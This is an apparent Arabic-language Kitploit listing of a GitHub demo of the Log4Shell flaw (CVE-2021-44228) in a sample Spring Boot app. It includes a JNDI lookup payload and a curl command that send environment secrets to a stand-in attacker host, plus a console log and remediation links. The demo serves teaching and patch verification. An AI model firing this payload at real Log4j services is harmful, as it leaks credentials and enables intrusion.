Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4j-vulnerability — Log4Shell (CVE-2021-44228) هي ثغرة يوم الصفر في Log4j | Kitploit
أدوات/GitHubGitHub/mazhar-hassan/log4j-vulnerability
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubmazhar-hassan/log4j-vulnerability

log4j-vulnerability

Log4Shell (CVE-2021-44228) هي ثغرة يوم الصفر في Log4j

عرض المستودع
منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Log4Shell (CVE-2021-44228) هي ثغرة يوم-صفر في Log4j

ثغرة Log4J

تاريخ الاكتشاف: 24 نوفمبر 2021

تاريخ التصحيح: 6 ديسمبر 2021

عرض الهجوم

اضغط أدناه لمشاهدة فيديو يوتيوب

هجوم تجريبي

تطبيق نموذجي

هذا التطبيق النموذجي هو تطبيق Spring Boot، ويستخدم log4j كإطار عمل لتسجيل السجلات، ويعمل مع متغيرات البيئة التالية على المنفذ 8080 على localhost

شاهد شرح الفيديو:

https://youtu.be/bb6pgWrm7tA

متغيرات البيئة

key=jason.bourne;secret=Treadstone

الهجوم

POST http://localhost:8080//v1/public/log-test

المعامل:

value=${jndi:ldap://some-random-hacking-site.com}

هجوم من العميل

الحصول على متغيرات البيئة

باستخدام السلسلة التالية يمكنك الحصول على متغيرات البيئة value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}

أمر Curl

curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -i http://localhost:8080/v1/public/log-test --data 'value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}'

سجل وحدة التحكم

2021-12-25 10:47:58,112 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://some-random-hacking-site.com]. javax.naming.CommunicationException: some-random-hacking-site:389 [Root exception is java.net.ConnectException: Connection timed out: connect] at com.sun.jndi.ldap.Connection.<init>(Connection.java:243) at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137) at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)

الإصلاح

https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot

التأكيد

mvn dependency:tree تأكد من أن أياً من ملفات الجرة التابعة لا يشير إلى إصدار log4j المعرض للخطر.

قائمة تشغيل Techflix للأمن على يوتيوب

https://www.youtube.com/watch?v=bb6pgWrm7tA&list=PLLqjNYIgOqeQl6NaeIeUhvNcWdpOVNkRi&index=1

تنزيل الأداة